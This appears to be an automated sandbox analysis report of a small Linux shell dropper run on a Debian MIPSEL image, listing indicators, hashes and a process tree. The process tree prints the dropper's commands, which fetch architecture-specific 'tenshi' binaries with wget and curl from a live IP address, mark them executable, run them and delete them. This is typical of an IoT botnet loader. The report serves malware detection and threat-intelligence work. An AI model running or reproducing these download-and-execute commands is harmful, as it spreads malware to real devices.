61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b

Analysis

max time kernel
78s
max time network
82s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
06/07/2024, 21:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

296a3c4f0b173217c609be610594274f_JaffaCakes118
Size

2KB
MD5

296a3c4f0b173217c609be610594274f
SHA1

62fe22125918753c6785043c45daef823b01f59f
SHA256

61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
SHA512

6350415f576e282262d4f99b2569725b04ca110fe4c4377c892cf80a7f0f87cd48bbeeaec4f713fc4a89961963a3cd2c24767caabf2104e5afe478f8bc0343e7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/tenshimips	731	tenshimips
/tmp/tenshimipsel	742	tenshimipsel
/tmp/tenshish4	747	tenshish4
/tmp/tenshix86	752	tenshix86
/tmp/tenshiarm6	766	tenshiarm6
/tmp/tenshii686	781	tenshii686
/tmp/tenshippc	798	tenshippc
/tmp/tenshii586	818	tenshii586
/tmp/tenshim68k	825	tenshim68k
/tmp/tenshish	830	tenshish
/tmp/tenshifuck	839	tenshifuck
/tmp/tenshiapache2	856	tenshiapache2
/tmp/tenshitelnetd	873	tenshitelnetd

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/tenshix86	curl
File opened for modification	/tmp/tenshippc	curl
File opened for modification	/tmp/tenshii586	curl
File opened for modification	/tmp/tenshim68k	curl
File opened for modification	/tmp/tenshifuck	curl
File opened for modification	/tmp/tenshiapache2	curl
File opened for modification	/tmp/tenshitelnetd	curl
File opened for modification	/tmp/tenshimips	curl
File opened for modification	/tmp/tenshish4	curl
File opened for modification	/tmp/tenshiarm6	curl
File opened for modification	/tmp/tenshimipsel	curl
File opened for modification	/tmp/tenshii686	curl
File opened for modification	/tmp/tenshish	curl

/tmp/296a3c4f0b173217c609be610594274f_JaffaCakes118
/tmp/296a3c4f0b173217c609be610594274f_JaffaCakes118
1⤵
PID:707
- /usr/bin/wget
  wget http://157.230.117.251/tenshimips
  2⤵
  PID:712
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshimips
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:717
- /bin/chmod
  chmod +x tenshimips
  2⤵
  PID:729
- /tmp/tenshimips
  ./tenshimips
  2⤵
  - Executes dropped EXE
  PID:731
- /bin/rm
  rm -rf tenshimips
  2⤵
  PID:732
- /usr/bin/wget
  wget http://157.230.117.251/tenshimipsel
  2⤵
  PID:734
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshimipsel
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/chmod
  chmod +x tenshimipsel
  2⤵
  PID:740
- /tmp/tenshimipsel
  ./tenshimipsel
  2⤵
  - Executes dropped EXE
  PID:742
- /bin/rm
  rm -rf tenshimipsel
  2⤵
  PID:743
- /usr/bin/wget
  wget http://157.230.117.251/tenshish4
  2⤵
  PID:744
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshish4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:745
- /bin/chmod
  chmod +x tenshish4
  2⤵
  PID:746
- /tmp/tenshish4
  ./tenshish4
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm -rf tenshish4
  2⤵
  PID:748
- /usr/bin/wget
  wget http://157.230.117.251/tenshix86
  2⤵
  PID:749
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshix86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/chmod
  chmod +x tenshix86
  2⤵
  PID:751
- /tmp/tenshix86
  ./tenshix86
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm -rf tenshix86
  2⤵
  PID:753
- /usr/bin/wget
  wget http://157.230.117.251/tenshiarm6
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshiarm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/chmod
  chmod +x tenshiarm6
  2⤵
  PID:765
- /tmp/tenshiarm6
  ./tenshiarm6
  2⤵
  - Executes dropped EXE
  PID:766
- /bin/rm
  rm -rf tenshiarm6
  2⤵
  PID:768
- /usr/bin/wget
  wget http://157.230.117.251/tenshii686
  2⤵
  PID:770
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshii686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/chmod
  chmod +x tenshii686
  2⤵
  PID:780
- /tmp/tenshii686
  ./tenshii686
  2⤵
  - Executes dropped EXE
  PID:781
- /bin/rm
  rm -rf tenshii686
  2⤵
  PID:784
- /usr/bin/wget
  wget http://157.230.117.251/tenshippc
  2⤵
  PID:785
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshippc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/chmod
  chmod +x tenshippc
  2⤵
  PID:797
- /tmp/tenshippc
  ./tenshippc
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm -rf tenshippc
  2⤵
  PID:800
- /usr/bin/wget
  wget http://157.230.117.251/tenshii586
  2⤵
  PID:801
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshii586
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/chmod
  chmod +x tenshii586
  2⤵
  PID:817
- /tmp/tenshii586
  ./tenshii586
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm -rf tenshii586
  2⤵
  PID:820
- /usr/bin/wget
  wget http://157.230.117.251/tenshim68k
  2⤵
  PID:821
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshim68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/chmod
  chmod +x tenshim68k
  2⤵
  PID:824
- /tmp/tenshim68k
  ./tenshim68k
  2⤵
  - Executes dropped EXE
  PID:825
- /bin/rm
  rm -rf tenshim68k
  2⤵
  PID:826
- /usr/bin/wget
  wget http://157.230.117.251/tenshish
  2⤵
  PID:827
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshish
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:828
- /bin/chmod
  chmod +x tenshish
  2⤵
  PID:829
- /tmp/tenshish
  ./tenshish
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm -rf tenshish
  2⤵
  PID:831
- /usr/bin/wget
  wget http://157.230.117.251/tenshifuck
  2⤵
  PID:832
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshifuck
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/chmod
  chmod +x tenshifuck
  2⤵
  PID:838
- /tmp/tenshifuck
  ./tenshifuck
  2⤵
  - Executes dropped EXE
  PID:839
- /bin/rm
  rm -rf tenshifuck
  2⤵
  PID:841
- /usr/bin/wget
  wget http://157.230.117.251/tenshiapache2
  2⤵
  PID:842
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshiapache2
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:847
- /bin/chmod
  chmod +x tenshiapache2
  2⤵
  PID:855
- /tmp/tenshiapache2
  ./tenshiapache2
  2⤵
  - Executes dropped EXE
  PID:856
- /bin/rm
  rm -rf tenshiapache2
  2⤵
  PID:858
- /usr/bin/wget
  wget http://157.230.117.251/tenshitelnetd
  2⤵
  PID:860
- /usr/bin/curl
  curl -O http://157.230.117.251/tenshitelnetd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/chmod
  chmod +x tenshitelnetd
  2⤵
  PID:871
- /tmp/tenshitelnetd
  ./tenshitelnetd
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm -rf tenshitelnetd
  2⤵
  PID:874

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tenshimips

Filesize
343B

MD5
01e9b3351a20632ce2de4a219637711c

SHA1
d46e0281e15a1ef4fec829351c47c0eacaf6ad5c

SHA256
b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2

SHA512
33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Download Submit